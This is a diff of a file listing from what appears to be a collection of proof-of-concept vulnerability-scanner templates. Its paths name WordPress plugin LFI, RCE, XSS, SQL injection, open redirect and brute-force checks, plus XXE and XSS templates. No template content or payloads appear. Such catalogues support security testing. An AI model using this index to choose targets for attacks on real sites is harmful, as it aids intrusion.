./poc/wordpress/wordpress-https-4a61ef799fd66b2a49253a5892d07d5e.yaml ./poc/wordpress/wordpress-https-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/wordpress-https-fc212cc7eec653319494b488cc7fe53d.yaml @@ -97189,13 +97205,14 @@ ./poc/wordpress/wordpress-infinitewp-auth-bypass-11289.yaml ./poc/wordpress/wordpress-infinitewp-auth-bypass.yaml ./poc/wordpress/wordpress-instagram-feed-c6f7df5b11c5d64e4d637b8f3456595f.yaml -./poc/wordpress/wordpress-instagram-feed.yaml ./poc/wordpress/wordpress-install.yaml -./poc/wordpress/wordpress-installer-log-11290.yaml ./poc/wordpress/wordpress-installer-log-11291.yaml +./poc/wordpress/wordpress-installer-log-11292.yaml ./poc/wordpress/wordpress-installer-log.yaml ./poc/wordpress/wordpress-language-7a04dfac5ff879ee9a27e2783540d3cb.yaml ./poc/wordpress/wordpress-language.yaml +./poc/wordpress/wordpress-lfi(1).yaml +./poc/wordpress/wordpress-lfi.yaml ./poc/wordpress/wordpress-login-11293.yaml ./poc/wordpress/wordpress-login-11294.yaml ./poc/wordpress/wordpress-login.yaml @@ -97249,10 +97266,10 @@ ./poc/wordpress/wordpress-popup.yaml ./poc/wordpress/wordpress-processing-embed-5346b5250cc01e79e0c30b2e57f1228f.yaml ./poc/wordpress/wordpress-processing-embed.yaml -./poc/wordpress/wordpress-rce-simplefilelist-11299.yaml ./poc/wordpress/wordpress-rce-simplefilelist-11300.yaml ./poc/wordpress/wordpress-rce-simplefilelist-11301.yaml ./poc/wordpress/wordpress-rce-simplefilelist-11302.yaml +./poc/wordpress/wordpress-rce-simplefilelist-11303.yaml ./poc/wordpress/wordpress-rce-simplefilelist-11304.yaml ./poc/wordpress/wordpress-rce-simplefilelist.yaml ./poc/wordpress/wordpress-rdf-user-enum-11305.yaml @@ -97330,10 +97347,11 @@ ./poc/wordpress/wordpress-tabs-slides.yaml ./poc/wordpress/wordpress-takeover-11310.yaml ./poc/wordpress/wordpress-takeover-11311.yaml -./poc/wordpress/wordpress-takeover-11312.yaml ./poc/wordpress/wordpress-takeover-11313.yaml +./poc/wordpress/wordpress-takeover-11314.yaml ./poc/wordpress/wordpress-takeover.yaml ./poc/wordpress/wordpress-themes-detect-11315.yaml +./poc/wordpress/wordpress-themes-detect-11316.yaml ./poc/wordpress/wordpress-themes-detect.yaml ./poc/wordpress/wordpress-themes2.yaml ./poc/wordpress/wordpress-tmm-db-migrate-11317.yaml @@ -97352,8 +97370,8 @@ ./poc/wordpress/wordpress-total-upkeep-backup-download.yaml ./poc/wordpress/wordpress-twitterbot-d36dd4bc6c1a3d5b4f0aafd5b7b723c5.yaml ./poc/wordpress/wordpress-twitterbot.yaml +./poc/wordpress/wordpress-updraftplus-pem-key-11325.yaml ./poc/wordpress/wordpress-updraftplus-pem-key-11326.yaml -./poc/wordpress/wordpress-updraftplus-pem-key-11327.yaml ./poc/wordpress/wordpress-updraftplus-pem-key-11328.yaml ./poc/wordpress/wordpress-updraftplus-pem-key.yaml ./poc/wordpress/wordpress-upload-data.yaml @@ -97370,6 +97388,7 @@ ./poc/wordpress/wordpress-users.yaml ./poc/wordpress/wordpress-weak-credentials-11334.yaml ./poc/wordpress/wordpress-weak-credentials-11335.yaml +./poc/wordpress/wordpress-weak-credentials-11336.yaml ./poc/wordpress/wordpress-weak-credentials-11337.yaml ./poc/wordpress/wordpress-weak-credentials.yaml ./poc/wordpress/wordpress-website-detect.yaml @@ -97379,6 +97398,7 @@ ./poc/wordpress/wordpress-woocommerce-listing-11338.yaml ./poc/wordpress/wordpress-woocommerce-listing-11339.yaml ./poc/wordpress/wordpress-woocommerce-listing-11340.yaml +./poc/wordpress/wordpress-woocommerce-listing-11341.yaml ./poc/wordpress/wordpress-woocommerce-sqli-1.yaml ./poc/wordpress/wordpress-woocommerce-sqli-11342.yaml ./poc/wordpress/wordpress-woocommerce-sqli-11343.yaml @@ -97388,11 +97408,11 @@ ./poc/wordpress/wordpress-woocommerce-sqli.yaml ./poc/wordpress/wordpress-wordfence-lfi-11346.yaml ./poc/wordpress/wordpress-wordfence-lfi-11347.yaml -./poc/wordpress/wordpress-wordfence-lfi-11348.yaml ./poc/wordpress/wordpress-wordfence-lfi-11349.yaml ./poc/wordpress/wordpress-wordfence-lfi-11350.yaml ./poc/wordpress/wordpress-wordfence-lfi-11351.yaml ./poc/wordpress/wordpress-wordfence-lfi-11352.yaml +./poc/wordpress/wordpress-wordfence-lfi.yaml ./poc/wordpress/wordpress-wordfence-waf-bypass-xss-11353.yaml ./poc/wordpress/wordpress-wordfence-waf-bypass-xss-11354.yaml ./poc/wordpress/wordpress-wordfence-waf-bypass-xss-11355.yaml @@ -97408,19 +97428,19 @@ ./poc/wordpress/wordpress-workflow-11365.yaml ./poc/wordpress/wordpress-wp-config-exposure.yml ./poc/wordpress/wordpress-wpconfig-inclosure.yaml -./poc/wordpress/wordpress-wpcourses-info-disclosure-11367.yaml ./poc/wordpress/wordpress-wpcourses-info-disclosure-11368.yaml ./poc/wordpress/wordpress-wpcourses-info-disclosure-11369.yaml ./poc/wordpress/wordpress-wpcourses-info-disclosure-11370.yaml +./poc/wordpress/wordpress-wpcourses-info-disclosure-11371.yaml ./poc/wordpress/wordpress-wpcourses-info-disclosure.yaml ./poc/wordpress/wordpress-xmlrpc-brute-force.yaml ./poc/wordpress/wordpress-xmlrpc-bruteforce.yaml ./poc/wordpress/wordpress-xmlrpc-enabled.yaml +./poc/wordpress/wordpress-xmlrpc-listmethods-11372.yaml ./poc/wordpress/wordpress-xmlrpc-listmethods-11373.yaml ./poc/wordpress/wordpress-xmlrpc-listmethods-11374.yaml -./poc/wordpress/wordpress-xmlrpc-listmethods.yaml +./poc/wordpress/wordpress-zebra-form-xss-11375.yaml ./poc/wordpress/wordpress-zebra-form-xss-11376.yaml -./poc/wordpress/wordpress-zebra-form-xss-11377.yaml ./poc/wordpress/wordpress-zebra-form-xss-11378.yaml ./poc/wordpress/wordpress-zebra-form-xss-11379.yaml ./poc/wordpress/wordpress-zebra-form-xss.yaml @@ -97429,7 +97449,7 @@ ./poc/wordpress/wordpress_bricks_builder_rce_cve_2024_25600.yaml ./poc/wordpress/wp-123contactform-plugin-listing-11400.yaml ./poc/wordpress/wp-123contactform-plugin-listing-11401.yaml -./poc/wordpress/wp-123contactform-plugin-listing-11402.yaml +./poc/wordpress/wp-123contactform-plugin-listing.yaml ./poc/wordpress/wp-2fa-424dc571941ef769e689b51f92ef63e1.yaml ./poc/wordpress/wp-2fa-4c7d4027ecd2f13690e7633bd7a7026c.yaml ./poc/wordpress/wp-2fa-6b87660c12b7cab2b7c94a97a0b1be72.yaml @@ -97482,6 +97502,7 @@ ./poc/wordpress/wp-ada-compliance-check-basic.yaml ./poc/wordpress/wp-adaptive-xss-11403.yaml ./poc/wordpress/wp-adaptive-xss-11404.yaml +./poc/wordpress/wp-adaptive-xss.yaml ./poc/wordpress/wp-admin-detect.yaml ./poc/wordpress/wp-admin-logo-changer-b53a8d77f88d9372be1c9e8baf08e8e0.yaml ./poc/wordpress/wp-admin-logo-changer.yaml @@ -97605,10 +97626,10 @@ ./poc/wordpress/wp-all-import.yaml ./poc/wordpress/wp-altair-listing-1.yaml ./poc/wordpress/wp-altair-listing-11405.yaml +./poc/wordpress/wp-altair-listing-11406.yaml ./poc/wordpress/wp-altair-listing-2.yaml ./poc/wordpress/wp-altair-listing-3.yaml ./poc/wordpress/wp-altair-listing-4.yaml -./poc/wordpress/wp-altair-listing.yaml ./poc/wordpress/wp-amasin-the-amazon-affiliate-shop-6ca90c027d7fd5775cb5f2e1ea477c3c.yaml ./poc/wordpress/wp-amasin-the-amazon-affiliate-shop.yaml ./poc/wordpress/wp-amazon-shop-90e615477738db895ced16515c910b83.yaml @@ -97639,8 +97660,8 @@ ./poc/wordpress/wp-anything-slider.yaml ./poc/wordpress/wp-aparat-ddb7d71f9b382077a0d3c539950fa9e4.yaml ./poc/wordpress/wp-aparat.yaml +./poc/wordpress/wp-app-log-11411.yaml ./poc/wordpress/wp-app-log-11412.yaml -./poc/wordpress/wp-app-log-11413.yaml ./poc/wordpress/wp-app-log-11414.yaml ./poc/wordpress/wp-app-log.yaml ./poc/wordpress/wp-app-maker-d5bf137b7ca050a2a583e1ae8ec72cb0.yaml @@ -97661,9 +97682,10 @@ ./poc/wordpress/wp-appointment-schedule-booking-system.yaml ./poc/wordpress/wp-appointments-schedules-18c89d6aa69e1599fc784ae097e34287.yaml ./poc/wordpress/wp-appointments-schedules.yaml +./poc/wordpress/wp-arforms-listing-11415.yaml ./poc/wordpress/wp-arforms-listing-11416.yaml -./poc/wordpress/wp-arforms-listing-11417.yaml ./poc/wordpress/wp-arforms-listing-11418.yaml +./poc/wordpress/wp-arforms-listing.yaml ./poc/wordpress/wp-aspose-cloud-ebook-plugin-file-download.yaml ./poc/wordpress/wp-asset-clean-up-2bdf53d1a4bcb567e4c12458624a2d4a.yaml ./poc/wordpress/wp-asset-clean-up-652e472006f64f31ed0d7ca21b1cec83.yaml @@ -97919,7 +97941,6 @@ ./poc/wordpress/wp-chinese-conversion-3ffa273267012b9b367a1dcbef702571.yaml ./poc/wordpress/wp-chinese-conversion.yaml ./poc/wordpress/wp-church-admin-lfi.yaml -./poc/wordpress/wp-church-admin-xss-11419.yaml ./poc/wordpress/wp-church-admin-xss-11420.yaml ./poc/wordpress/wp-church-admin-xss-11421.yaml ./poc/wordpress/wp-church-admin-xss-11422.yaml @@ -97969,8 +97990,8 @@ ./poc/wordpress/wp-code-highlightjs-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/wp-code-highlightjs-plugin.yaml ./poc/wordpress/wp-code-highlightjs.yaml +./poc/wordpress/wp-code-snippets-xss-11425.yaml ./poc/wordpress/wp-code-snippets-xss-11426.yaml -./poc/wordpress/wp-code-snippets-xss.yaml ./poc/wordpress/wp-codemirror-block-00c8945b2d90aba47cb8e8cc192bdf4e.yaml ./poc/wordpress/wp-codemirror-block.yaml ./poc/wordpress/wp-coder-132985a8b76990e0c6cd6695eb596f6c.yaml @@ -98171,8 +98192,8 @@ ./poc/wordpress/wp-custom-post-template.yaml ./poc/wordpress/wp-custom-tables-xss-11431.yaml ./poc/wordpress/wp-custom-tables-xss-11432.yaml +./poc/wordpress/wp-custom-tables-xss-11433.yaml ./poc/wordpress/wp-custom-tables-xss-11434.yaml -./poc/wordpress/wp-custom-tables-xss-11435.yaml ./poc/wordpress/wp-custom-tables-xss.yaml ./poc/wordpress/wp-custom-widget-area-1ea5db37756be1000588b9e7abbeedc9.yaml ./poc/wordpress/wp-custom-widget-area.yaml @@ -98514,6 +98535,7 @@ ./poc/wordpress/wp-email-subscribers-listing-11440.yaml ./poc/wordpress/wp-email-subscribers-listing-11441.yaml ./poc/wordpress/wp-email-subscribers-listing-11442.yaml +./poc/wordpress/wp-email-subscribers-listing-11443.yaml ./poc/wordpress/wp-email-template-1729a8753eae476fa81f29fbf915eae7.yaml ./poc/wordpress/wp-email-template-77ad67534972b8073fe68dc3e6a0ae34.yaml ./poc/wordpress/wp-email-template-9ceea61553b1440c884786aa4c073642.yaml @@ -99012,20 +99034,21 @@ ./poc/wordpress/wp-gravity-forms-spreadsheets-ce51e508f7b3ae4fa3cfc0e4f02b85ff.yaml ./poc/wordpress/wp-gravity-forms-spreadsheets-e2b56e01ba06c66b8d53d40581b73ce6.yaml ./poc/wordpress/wp-gravity-forms-spreadsheets.yaml -./poc/wordpress/wp-grimag-open-redirect-11458.yaml ./poc/wordpress/wp-grimag-open-redirect-11459.yaml ./poc/wordpress/wp-grimag-open-redirect-11460.yaml ./poc/wordpress/wp-grimag-open-redirect-11461.yaml ./poc/wordpress/wp-grimag-open-redirect-11462.yaml +./poc/wordpress/wp-grimag-open-redirect.yaml ./poc/wordpress/wp-gtranslate-open-redirect-11463.yaml ./poc/wordpress/wp-gtranslate-open-redirect-11464.yaml ./poc/wordpress/wp-gtranslate-open-redirect-11465.yaml +./poc/wordpress/wp-gtranslate-open-redirect-11466.yaml ./poc/wordpress/wp-guestmap-138b91374da611e5609255da3727b885.yaml ./poc/wordpress/wp-guestmap.yaml ./poc/wordpress/wp-guppy-c55927dc6402e6af39078d4c3378b5b6.yaml ./poc/wordpress/wp-guppy.yaml ./poc/wordpress/wp-gutenberg-xss.yaml -./poc/wordpress/wp-haberadam-idor-11468.yaml +./poc/wordpress/wp-haberadam-idor-11467.yaml ./poc/wordpress/wp-haberadam-idor.yaml ./poc/wordpress/wp-header-images-778b726247bbcead8f63ba72f803b4d7.yaml ./poc/wordpress/wp-header-images.yaml @@ -99171,8 +99194,8 @@ ./poc/wordpress/wp-insert.yaml ./poc/wordpress/wp-instagram-bank-a759e03a3140ab5da9f810ffbdb3a4c2.yaml ./poc/wordpress/wp-instagram-bank.yaml +./poc/wordpress/wp-install-11473.yaml ./poc/wordpress/wp-install-11474.yaml -./poc/wordpress/wp-install-11475.yaml ./poc/wordpress/wp-install-php.yaml ./poc/wordpress/wp-install.yaml ./poc/wordpress/wp-instance-rename-f54408534e740536e4255c5420540815.yaml @@ -99203,10 +99226,10 @@ ./poc/wordpress/wp-invoice.yaml ./poc/wordpress/wp-iwp-client-listing-11476.yaml ./poc/wordpress/wp-iwp-client-listing-11477.yaml +./poc/wordpress/wp-iwp-client-listing-11478.yaml ./poc/wordpress/wp-iwp-client-listing-11479.yaml ./poc/wordpress/wp-javospot-lfi-11480.yaml ./poc/wordpress/wp-javospot-lfi-11481.yaml -./poc/wordpress/wp-javospot-lfi-11482.yaml ./poc/wordpress/wp-javospot-premium-theme-lfi.yaml ./poc/wordpress/wp-job-manager-01d0e051ce7c64530bcfd611e9966721.yaml ./poc/wordpress/wp-job-manager-081702b1ba79285598cf4c81dec69a0d.yaml @@ -99307,7 +99330,6 @@ ./poc/wordpress/wp-knews-xss-11484.yaml ./poc/wordpress/wp-knews-xss-11485.yaml ./poc/wordpress/wp-knews-xss-11486.yaml -./poc/wordpress/wp-knews-xss-11487.yaml ./poc/wordpress/wp-knews-xss-11488.yaml ./poc/wordpress/wp-knews-xss.yaml ./poc/wordpress/wp-knowledgebase-ce12311920213990a4e4a36be60be911.yaml @@ -99346,8 +99368,8 @@ ./poc/wordpress/wp-levoslideshow-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/wp-levoslideshow-plugin.yaml ./poc/wordpress/wp-levoslideshow.yaml +./poc/wordpress/wp-license-file-11489.yaml ./poc/wordpress/wp-license-file-11490.yaml -./poc/wordpress/wp-license-file-11491.yaml ./poc/wordpress/wp-license-file.yaml ./poc/wordpress/wp-license.yaml ./poc/wordpress/wp-lightbox-2-77e6013abc8939366eda9dc7f95c8a05.yaml @@ -99507,9 +99529,8 @@ ./poc/wordpress/wp-mail-smtp-pro.yaml ./poc/wordpress/wp-mail-smtp.yaml ./poc/wordpress/wp-mail.yaml -./poc/wordpress/wp-mailchimp-log-exposure-11492.yaml ./poc/wordpress/wp-mailchimp-log-exposure-11493.yaml -./poc/wordpress/wp-mailchimp-log-exposure.yaml +./poc/wordpress/wp-mailchimp-log-exposure-11494.yaml ./poc/wordpress/wp-mailster-d920be8a0c209910a2150936fe45b839.yaml ./poc/wordpress/wp-mailster.yaml ./poc/wordpress/wp-mailto-links-9e4406b99ed9728029497ac1e97783e2.yaml @@ -99614,7 +99635,6 @@ ./poc/wordpress/wp-memphis-documents-library-lfi-11497.yaml ./poc/wordpress/wp-memphis-documents-library-lfi-11499.yaml ./poc/wordpress/wp-memphis-documents-library-lfi-2.yaml -./poc/wordpress/wp-memphis-documents-library-lfi.yaml ./poc/wordpress/wp-menu-cart-9ecf9f388452040136695fbe6305b098.yaml ./poc/wordpress/wp-menu-cart-bdc2dad783c466f5389fa247d2e10777.yaml ./poc/wordpress/wp-menu-cart-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -99722,6 +99742,7 @@ ./poc/wordpress/wp-mpdf-95b1d86b0d9172f70e27dd5cdd6025a1.yaml ./poc/wordpress/wp-mpdf.yaml ./poc/wordpress/wp-mstore-plugin-listing-11501.yaml +./poc/wordpress/wp-mstore-plugin-listing.yaml ./poc/wordpress/wp-mui-mass-user-input-a8af40a859ef12017793ca809201c2d2.yaml ./poc/wordpress/wp-mui-mass-user-input-b32a81e6becbfc443d59541b147d668c.yaml ./poc/wordpress/wp-mui-mass-user-input-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -99736,7 +99757,6 @@ ./poc/wordpress/wp-multiple-theme-ssrf-11510.yaml ./poc/wordpress/wp-multiple-theme-ssrf-11511.yaml ./poc/wordpress/wp-multiple-theme-ssrf-11512.yaml -./poc/wordpress/wp-multiple-theme-ssrf-11513.yaml ./poc/wordpress/wp-multisite-content-copier-02469035e949992a5abfd04fc61ddbad.yaml ./poc/wordpress/wp-multisite-content-copier-9f591f88f9aee0030295b5c3d28f9149.yaml ./poc/wordpress/wp-multisite-content-copier-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -99774,6 +99794,7 @@ ./poc/wordpress/wp-news-magazine.yaml ./poc/wordpress/wp-nextgen-xss-11514.yaml ./poc/wordpress/wp-nextgen-xss-11515.yaml +./poc/wordpress/wp-nextgen-xss-11516.yaml ./poc/wordpress/wp-nextgen-xss-11517.yaml ./poc/wordpress/wp-nextgen-xss-11518.yaml ./poc/wordpress/wp-nextgen-xss.yaml @@ -99832,6 +99853,7 @@ ./poc/wordpress/wp-oxygen-theme-lfi-11520.yaml ./poc/wordpress/wp-oxygen-theme-lfi-11521.yaml ./poc/wordpress/wp-oxygen-theme-lfi-11523.yaml +./poc/wordpress/wp-oxygen-theme-lfi.yaml ./poc/wordpress/wp-page-duplicator-be65ad55f4da905c8cc51fe26685a61e.yaml ./poc/wordpress/wp-page-duplicator.yaml ./poc/wordpress/wp-page-numbers-deeffc536ac92ea53731ce0c6d98a5c8.yaml @@ -99987,6 +100009,7 @@ ./poc/wordpress/wp-plugin-utlimate-member-11539.yaml ./poc/wordpress/wp-plugin-utlimate-member-11540.yaml ./poc/wordpress/wp-plugin-utlimate-member-11541.yaml +./poc/wordpress/wp-plugin-utlimate-member-11542.yaml ./poc/wordpress/wp-plugin-wp-with-spritz-lfi.yaml ./poc/wordpress/wp-plugins.yaml ./poc/wordpress/wp-pocket-urls-254217ba23bf67e5ab1f8ee2edeef109.yaml @@ -100013,7 +100036,6 @@ ./poc/wordpress/wp-popup-builder-0c09eb9779aee8d5af8e26f717d75189.yaml ./poc/wordpress/wp-popup-builder-a5f68b9d82c37b214641a19757438e98.yaml ./poc/wordpress/wp-popup-builder.yaml -./poc/wordpress/wp-popup-listing-11543.yaml ./poc/wordpress/wp-popup-listing-11544.yaml ./poc/wordpress/wp-popup-listing-11545.yaml ./poc/wordpress/wp-popups-lite-397d56c4826cb39d4978e607d024b3f6.yaml @@ -100170,11 +100192,10 @@ ./poc/wordpress/wp-prostore-open-redirect-11547.yaml ./poc/wordpress/wp-prostore-open-redirect-11548.yaml ./poc/wordpress/wp-prostore-open-redirect-11549.yaml -./poc/wordpress/wp-prostore-open-redirect-11550.yaml ./poc/wordpress/wp-publications-b85a3c11767227494a836174e6262f5c.yaml ./poc/wordpress/wp-publications.yaml ./poc/wordpress/wp-qards-listing-11551.yaml -./poc/wordpress/wp-qards-listing-11552.yaml +./poc/wordpress/wp-qards-listing.yaml ./poc/wordpress/wp-qrcode-me-v-card-314ed947e5aebc74cf601ba290f4edad.yaml ./poc/wordpress/wp-qrcode-me-v-card.yaml ./poc/wordpress/wp-quick-front-end-editor-02de13f83ec39d9f9fa219b2764f4023.yaml @@ -100414,8 +100435,10 @@ ./poc/wordpress/wp-search-keyword-redirect-bf4ef59a087b3009bcd665ccc0df58a8.yaml ./poc/wordpress/wp-search-keyword-redirect.yaml ./poc/wordpress/wp-securimage-xss-11556.yaml +./poc/wordpress/wp-securimage-xss-11557.yaml ./poc/wordpress/wp-securimage-xss-11558.yaml ./poc/wordpress/wp-securimage-xss-11559.yaml +./poc/wordpress/wp-securimage-xss-11560.yaml ./poc/wordpress/wp-securimage-xss.yaml ./poc/wordpress/wp-security-audit-log-00ed417b21dd63bdfa86736dcf1b985f.yaml ./poc/wordpress/wp-security-audit-log-069819bcca9f4c9d5cccbe176453ccc4.yaml @@ -100495,6 +100518,7 @@ ./poc/wordpress/wp-setup-config.yaml ./poc/wordpress/wp-setup-wizard-8c031e05af523e07598a9fec815c857a.yaml ./poc/wordpress/wp-setup-wizard.yaml +./poc/wordpress/wp-sfwd-lms-listing-11562.yaml ./poc/wordpress/wp-sfwd-lms-listing-11563.yaml ./poc/wordpress/wp-sfwd-lms-listing-11564.yaml ./poc/wordpress/wp-sfwd-lms-listing-11565.yaml @@ -100545,9 +100569,9 @@ ./poc/wordpress/wp-simple-events.yaml ./poc/wordpress/wp-simple-fields-lfi-11566.yaml ./poc/wordpress/wp-simple-fields-lfi-11567.yaml -./poc/wordpress/wp-simple-fields-lfi-11568.yaml ./poc/wordpress/wp-simple-fields-lfi-11569.yaml ./poc/wordpress/wp-simple-fields-lfi-11570.yaml +./poc/wordpress/wp-simple-fields-lfi-11571.yaml ./poc/wordpress/wp-simple-firewall-3ae2ab7cde1e76100e523aaf928ed76a.yaml ./poc/wordpress/wp-simple-firewall-4f7bee968b7be1bbc933652a546908b5.yaml ./poc/wordpress/wp-simple-firewall-5843a59deee1d98f848220c24385547a.yaml @@ -100591,10 +100615,10 @@ ./poc/wordpress/wp-sitemap-page.yaml ./poc/wordpress/wp-slick-slider-and-image-carousel-7851c267c5129958224bd7b0d064e1e0.yaml ./poc/wordpress/wp-slick-slider-and-image-carousel.yaml +./poc/wordpress/wp-slideshow-xss-11572.yaml ./poc/wordpress/wp-slideshow-xss-11573.yaml ./poc/wordpress/wp-slideshow-xss-11574.yaml ./poc/wordpress/wp-slideshow-xss-11575.yaml -./poc/wordpress/wp-slideshow-xss-11576.yaml ./poc/wordpress/wp-slideshow-xss.yaml ./poc/wordpress/wp-slimstat-11cc5bcae93c068aebc65d8de7e515c1.yaml ./poc/wordpress/wp-slimstat-1fc9f020991eebfa5f69f5e6000f4ad1.yaml @@ -100704,7 +100728,6 @@ ./poc/wordpress/wp-social-widget-d7b289a4844fbc5f1814a16ab030f4b4.yaml ./poc/wordpress/wp-social-widget.yaml ./poc/wordpress/wp-social.yaml -./poc/wordpress/wp-socialfit-xss-11577.yaml ./poc/wordpress/wp-socialfit-xss-11579.yaml ./poc/wordpress/wp-socialfit-xss-11580.yaml ./poc/wordpress/wp-socialfit-xss-11581.yaml @@ -100906,6 +100929,7 @@ ./poc/wordpress/wp-super-cache.yaml ./poc/wordpress/wp-super-forms-11585.yaml ./poc/wordpress/wp-super-forms-11586.yaml +./poc/wordpress/wp-super-forms-11587.yaml ./poc/wordpress/wp-super-forms-11588.yaml ./poc/wordpress/wp-super-minify-92bce3d20b21e8099e97453d704543ec.yaml ./poc/wordpress/wp-super-minify.yaml @@ -101129,8 +101153,8 @@ ./poc/wordpress/wp-tutor-lfi-11597.yaml ./poc/wordpress/wp-tutor-lfi-11598.yaml ./poc/wordpress/wp-tutor-lfi-11599.yaml +./poc/wordpress/wp-tutor-lfi-11600.yaml ./poc/wordpress/wp-tutor-lfi-11601.yaml -./poc/wordpress/wp-tutor-lfi.yaml ./poc/wordpress/wp-twilio-core-57a9edaed661bdb0228f355d7457cb63.yaml ./poc/wordpress/wp-twilio-core-6477bf18cad6c823db485408d49b337b.yaml ./poc/wordpress/wp-twilio-core.yaml @@ -101212,8 +101236,7 @@ ./poc/wordpress/wp-upg.yaml ./poc/wordpress/wp-upload-data-11602.yaml ./poc/wordpress/wp-upload-data-11603.yaml -./poc/wordpress/wp-upload-data-11604.yaml -./poc/wordpress/wp-upload-data.yaml +./poc/wordpress/wp-upload-data-11605.yaml ./poc/wordpress/wp-upload-restriction-34ada383253b9728876613379fa9dea6.yaml ./poc/wordpress/wp-upload-restriction-3b5c347348b988baaab2601e987517ae.yaml ./poc/wordpress/wp-upload-restriction-81b96fa379daa9e93cab1ad57b78f1f7.yaml @@ -101325,7 +101348,6 @@ ./poc/wordpress/wp-vault-36522aff6cb0aa221459ad25d5a372e2.yaml ./poc/wordpress/wp-vault-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/wp-vault-fce2eb0132044a6806470980c3e8427d.yaml -./poc/wordpress/wp-vault-lfi(1).yaml ./poc/wordpress/wp-vault-lfi-11606.yaml ./poc/wordpress/wp-vault-lfi-11607.yaml ./poc/wordpress/wp-vault-lfi-11608.yaml @@ -101432,8 +101454,8 @@ ./poc/wordpress/wp-worthy.yaml ./poc/wordpress/wp-xmlrpc-11629.yaml ./poc/wordpress/wp-xmlrpc-11630.yaml +./poc/wordpress/wp-xmlrpc-11631.yaml ./poc/wordpress/wp-xmlrpc-brute-force-11623.yaml -./poc/wordpress/wp-xmlrpc-brute-force-11624.yaml ./poc/wordpress/wp-xmlrpc-brute-force.yaml ./poc/wordpress/wp-xmlrpc-bruteforce.yaml ./poc/wordpress/wp-xmlrpc-check.yaml @@ -101977,10 +101999,9 @@ ./poc/wordpress/wpmu-f535dd9c67cc53c57251591f727ba1d3.yaml ./poc/wordpress/wpmu.yaml ./poc/wordpress/wpmudev-my-calender-xss-11502.yaml -./poc/wordpress/wpmudev-my-calender-xss-11503.yaml ./poc/wordpress/wpmudev-my-calender-xss.yaml -./poc/wordpress/wpmudev-pub-keys-11504.yaml ./poc/wordpress/wpmudev-pub-keys-11505.yaml +./poc/wordpress/wpmudev-pub-keys-11506.yaml ./poc/wordpress/wpmudev-pub-keys-11507.yaml ./poc/wordpress/wpmudev-pub-keys.yaml ./poc/wordpress/wpo365-login-b42359728e76b0d180e7fa1e8292b5a9.yaml @@ -102180,8 +102201,7 @@ ./poc/wordpress/wptouch-fa8996e405ccfd1e139b071450a49a11.yaml ./poc/wordpress/wptouch-open-redirect-11592.yaml ./poc/wordpress/wptouch-open-redirect-11593.yaml -./poc/wordpress/wptouch-open-redirect-11595.yaml -./poc/wordpress/wptouch-open-redirect.yaml +./poc/wordpress/wptouch-open-redirect-11594.yaml ./poc/wordpress/wptouch-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/wptouch-plugin-open-redirect.yaml ./poc/wordpress/wptouch-plugin.yaml @@ -102295,7 +102315,7 @@ ./poc/xml_external_entity/seeyon-oa-getAjaxDataServlet-xxe.yaml ./poc/xml_external_entity/solr-cve-2017-12629-xxe.yml ./poc/xml_external_entity/springboot-actuators-jolokia-xxe-1.yaml -./poc/xml_external_entity/springboot-actuators-jolokia-xxe-10428.yaml +./poc/xml_external_entity/springboot-actuators-jolokia-xxe-10429.yaml ./poc/xml_external_entity/springboot-actuators-jolokia-xxe-10430.yaml ./poc/xml_external_entity/springboot-actuators-jolokia-xxe-10431.yaml ./poc/xml_external_entity/springboot-actuators-jolokia-xxe-10432.yaml @@ -102342,11 +102362,12 @@ ./poc/xss/academy-lms-xss.yaml ./poc/xss/accessibility-helper-xss-19.yaml ./poc/xss/accessibility-helper-xss.yaml +./poc/xss/acme-xss-28.yaml ./poc/xss/acme-xss-29.yaml -./poc/xss/acme-xss-30.yaml ./poc/xss/acme-xss.yaml ./poc/xss/admin-ajax-xss.yaml ./poc/xss/aem-setpreferences-xss-189.yaml +./poc/xss/aem-setpreferences-xss.yaml ./poc/xss/aem-xss-childlist-selector-198.yaml ./poc/xss/aikcms_v2-xss.yaml ./poc/xss/akamai-arl-xss-246.yaml @@ -102380,18 +102401,18 @@ ./poc/xss/citrix-cve-2020-8191-xss.yml ./poc/xss/ckan-dom-based-xss-990.yaml ./poc/xss/ckan-dom-based-xss-991.yaml -./poc/xss/ckan-dom-based-xss-992.yaml ./poc/xss/ckan-dom-based-xss-993.yaml +./poc/xss/ckan-dom-based-xss.yaml ./poc/xss/clicshopping-v2-xss.yaml ./poc/xss/coldfusion-debug-xss-1.yaml +./poc/xss/coldfusion-debug-xss-1152.yaml ./poc/xss/coldfusion-debug-xss-1153.yaml ./poc/xss/coldfusion-debug-xss-1154.yaml ./poc/xss/coldfusion-debug-xss-2.yaml -./poc/xss/coldfusion-debug-xss.yaml +./poc/xss/concrete-xss-1174.yaml ./poc/xss/concrete-xss-1175.yaml ./poc/xss/concrete-xss-1176.yaml ./poc/xss/concrete-xss-1177.yaml -./poc/xss/concrete-xss-1178.yaml ./poc/xss/concretexss.yaml ./poc/xss/ctp-xss.yaml ./poc/xss/custom-aem-xss.yaml @@ -102403,6 +102424,7 @@ ./poc/xss/discourse-xss-7014.yaml ./poc/xss/discourse-xss.yaml ./poc/xss/dlink-netgear-xss.yaml +./poc/xss/dom-xss-7080.yaml ./poc/xss/dom-xss-siteminder.yaml ./poc/xss/dom-xss-web-message.yaml ./poc/xss/dom-xss.yaml @@ -102412,13 +102434,13 @@ ./poc/xss/eclipse-xss.yaml ./poc/xss/elex-woocommerce-xss-7199.yaml ./poc/xss/elex-woocommerce-xss-7200.yaml +./poc/xss/elex-woocommerce-xss.yaml ./poc/xss/empirecms-xss-7218.yaml ./poc/xss/empirecms-xss-7219.yaml ./poc/xss/empirecms-xss-7220.yaml ./poc/xss/eris-xss.yaml ./poc/xss/exchange-cve-2021-41349-xss.yml ./poc/xss/express-xss.yaml -./poc/xss/feedwordpress-xss-7459.yaml ./poc/xss/feedwordpress-xss-7460.yaml ./poc/xss/feedwordpress-xss.yaml ./poc/xss/flow-flow-social-stream-xss.yaml @@ -102431,8 +102453,10 @@ ./poc/xss/geovision-geowebserver-xss-7599.yaml ./poc/xss/geovision-geowebserver-xss-7600.yaml ./poc/xss/geovision-geowebserver-xss-7601.yaml 